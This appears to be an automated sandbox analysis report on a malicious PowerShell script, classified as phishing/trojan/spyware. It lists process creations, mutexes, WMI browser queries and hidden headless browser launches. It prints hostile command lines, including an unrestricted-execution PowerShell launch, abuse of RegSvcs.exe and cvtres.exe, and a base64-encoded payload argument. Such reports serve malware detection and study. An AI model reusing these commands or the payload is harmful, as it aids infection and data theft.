Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00444197	3_2_00444197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00432D70	3_2_00432D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00404EF0	3_2_00404EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0043CFB9	3_2_0043CFB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004051A0	3_2_004051A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00405450	3_2_00405450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042B610	3_2_0042B610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042F82B	3_2_0042F82B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00445E24	3_2_00445E24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00445F44	3_2_00445F44
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D6D00	8_2_048D6D00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D5808	8_2_048D5808
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D8AC8	8_2_048D8AC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D4A38	8_2_048D4A38
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D7A58	8_2_048D7A58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048DC309	8_2_048DC309
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048DC350	8_2_048DC350
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048DDC90	8_2_048DDC90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D5C18	8_2_048D5C18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D3E48	8_2_048D3E48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D6670	8_2_048D6670
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048DB788	8_2_048DB788
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D57B0	8_2_048D57B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D57F9	8_2_048D57F9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048DB778	8_2_048DB778
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048DB0D8	8_2_048DB0D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048DB0E8	8_2_048DB0E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D8AAE	8_2_048D8AAE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048DCAC8	8_2_048DCAC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D72C1	8_2_048D72C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D4A28	8_2_048D4A28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048DD3E0	8_2_048DD3E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048DD3F0	8_2_048DD3F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D7318	8_2_048D7318
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D9B20	8_2_048D9B20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D9B30	8_2_048D9B30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048DB332	8_2_048DB332
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048DB340	8_2_048DB340
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048DC340	8_2_048DC340
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0E497E28	8_2_0E497E28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0E490940	8_2_0E490940
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0E490950	8_2_0E490950
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0E492213	8_2_0E492213
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0E49222C	8_2_0E49222C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0E49229F	8_2_0E49229F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0E491FE8	8_2_0E491FE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0E491FF8	8_2_0E491FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_010E1467	11_2_010E1467
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_010E1480	11_2_010E1480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_010E38DB	11_2_010E38DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_010E1B0A	11_2_010E1B0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_010E1B23	11_2_010E1B23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_010E1B5B	11_2_010E1B5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_010E1A48	11_2_010E1A48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_010E1A90	11_2_010E1A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_010E1AA8	11_2_010E1AA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_010E1ABF	11_2_010E1ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_010E1AD7	11_2_010E1AD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_010E1AF1	11_2_010E1AF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_010E3E08	11_2_010E3E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C51C58	11_2_06C51C58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C50D75	11_2_06C50D75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C51C51	11_2_06C51C51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C519C8	11_2_06C519C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C519B8	11_2_06C519B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C876C8	11_2_06C876C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C876B9	11_2_06C876B9
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 36_2_000002163BAA89F7	36_2_000002163BAA89F7
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 36_2_000002163BAA21F2	36_2_000002163BAA21F2
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 36_2_000002163BAA291C	36_2_000002163BAA291C
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 36_2_000002163BAA2232	36_2_000002163BAA2232

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0042A6C0 appears 56 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00429E71 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00423190 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 004240A0 appears 136 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 004061F0 appears 33 times

Source: 8.2.powershell.exe.5b8a088.3.raw.unpack, SelectorTester.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 8.2.powershell.exe.5b8a088.3.raw.unpack, InspectorAggregator.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 8.2.powershell.exe.5b8a088.3.raw.unpack, InspectorAggregator.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winPS1@74/549@194/17

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_0040E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,

3_2_0040E8D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\34[1].png

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\ba5217eadeaf
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2384:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2404:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\6799c0f0012efb43c917da9a4c26013f
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2700:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcsu11pw.2kb.ps1

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Process created: C:\Windows\explorer.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name = 'chrome.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name = 'firefox.exe'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: qOH6oNqqoi.ps1

Virustotal: Detection: 18%

Source: RegSvcs.exe	String found in binary or memory: " /add /y
Source: RegSvcs.exe	String found in binary or memory: " /add

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qOH6oNqqoi.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\10000100141\34.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe H4sIAAAAAAAEAD3Mz0rDMBwAYMoUoSroG4QdBX/mb013S7vKLg6pE0EjWNfMBW0DSbaJR9/JB/A1BMFH0YN4/Q7f8DtJv5L0M0kRoeWYlJIrSYQiTNGMq0JKIfBpxlmFhwfXtm/dJqCxWZi+Nf7oXwhGGS9spNscCMjRvmo729sQfROdLw6Xqwfj4+3kqqjq2fFFeTf5eB/UezkFKgRIAYzfDKYn6n7L7/zuzeo5vublSP/9+tzOvQtuEWFazfSZbzqzcf5JrzlgYJiRXNfm8XI9D2BezFuyi1uElwh3CIcfg6vl8uMAAAA=
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\Lite\User Data" "data:text/html,<title>PURE! CHROME</title>" --disable-fre --no-default-browser-check --no-first-run --mute-audio --enable-webgl --ignore-gpu-blacklist --use-gl=desktop
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-gl=desktop --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\Lite\User Data" --mojo-platform-channel-handle=2320 --field-trial-handle=1956,i,13439096136627422704,13915757122637099083,262144 /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -no-remote -profile "C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -no-remote -profile C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2232 -parentBuildID 20230927232528 -prefsHandle 2176 -prefMapHandle 2160 -prefsLen 25187 -prefMapSize 238318 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {056debd8-2c32-4e4b-8d1a-c1211c19f384} 8116 "\\.\pipe\gecko-crash-server-pipe.8116" 26f2b66b710 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3828 -parentBuildID 20230927232528 -prefsHandle 4060 -prefMapHandle 4112 -prefsLen 25339 -prefMapSize 238318 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8bc9d08e-b767-42e6-af2a-e4e7600495b1} 8116 "\\.\pipe\gecko-crash-server-pipe.8116" 26f2b67b810 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5284 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5348 -prefMapHandle 5344 -prefsLen 33506 -prefMapSize 238318 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {71187824-d2c0-460a-97ac-7894c435e281} 8116 "\\.\pipe\gecko-crash-server-pipe.8116" 26f477e4d10 utility
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\pingsender.exe "C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/11b61c58-6867-4a5f-9aad-2f9d3c403f14/event/Firefox/118.0.1/release/20230927232528?v=4 C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\11b61c58-6867-4a5f-9aad-2f9d3c403f14
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\pingsender.exe "C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/47ecb6f6-6e2a-4b91-bef9-d3dd22eada1b/health/Firefox/118.0.1/release/20230927232528?v=4 C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\47ecb6f6-6e2a-4b91-bef9-d3dd22eada1b
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\pingsender.exe "C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/a0ebe742-48e8-4a28-8e8d-154ae0edb2dd/main/Firefox/118.0.1/release/20230927232528?v=4 C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\a0ebe742-48e8-4a28-8e8d-154ae0edb2dd
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\Lite\User Data" "data:text/html,<title>PURE! CHROME</title>" --disable-fre --no-default-browser-check --no-first-run --mute-audio --enable-webgl --ignore-gpu-blacklist --use-gl=desktop
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\10000100141\34.ps1"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe H4sIAAAAAAAEAD3Mz0rDMBwAYMoUoSroG4QdBX/mb013S7vKLg6pE0EjWNfMBW0DSbaJR9/JB/A1BMFH0YN4/Q7f8DtJv5L0M0kRoeWYlJIrSYQiTNGMq0JKIfBpxlmFhwfXtm/dJqCxWZi+Nf7oXwhGGS9spNscCMjRvmo729sQfROdLw6Xqwfj4+3kqqjq2fFFeTf5eB/UezkFKgRIAYzfDKYn6n7L7/zuzeo5vublSP/9+tzOvQtuEWFazfSZbzqzcf5JrzlgYJiRXNfm8XI9D2BezFuyi1uElwh3CIcfg6vl8uMAAAA=	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-gl=desktop --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\Lite\User Data" --mojo-platform-channel-handle=2320 --field-trial-handle=1956,i,13439096136627422704,13915757122637099083,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -no-remote -profile C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2232 -parentBuildID 20230927232528 -prefsHandle 2176 -prefMapHandle 2160 -prefsLen 25187 -prefMapSize 238318 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {056debd8-2c32-4e4b-8d1a-c1211c19f384} 8116 "\\.\pipe\gecko-crash-server-pipe.8116" 26f2b66b710 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3828 -parentBuildID 20230927232528 -prefsHandle 4060 -prefMapHandle 4112 -prefsLen 25339 -prefMapSize 238318 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8bc9d08e-b767-42e6-af2a-e4e7600495b1} 8116 "\\.\pipe\gecko-crash-server-pipe.8116" 26f2b67b810 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5284 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5348 -prefMapHandle 5344 -prefsLen 33506 -prefMapSize 238318 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {71187824-d2c0-460a-97ac-7894c435e281} 8116 "\\.\pipe\gecko-crash-server-pipe.8116" 26f477e4d10 utility
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\pingsender.exe "C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/11b61c58-6867-4a5f-9aad-2f9d3c403f14/event/Firefox/118.0.1/release/20230927232528?v=4 C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\11b61c58-6867-4a5f-9aad-2f9d3c403f14
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\pingsender.exe "C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/47ecb6f6-6e2a-4b91-bef9-d3dd22eada1b/health/Firefox/118.0.1/release/20230927232528?v=4 C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\47ecb6f6-6e2a-4b91-bef9-d3dd22eada1b
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\pingsender.exe "C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/a0ebe742-48e8-4a28-8e8d-154ae0edb2dd/main/Firefox/118.0.1/release/20230927232528?v=4 C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\saved-telemetry-pings\a0ebe742-48e8-4a28-8e8d-154ae0edb2dd
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
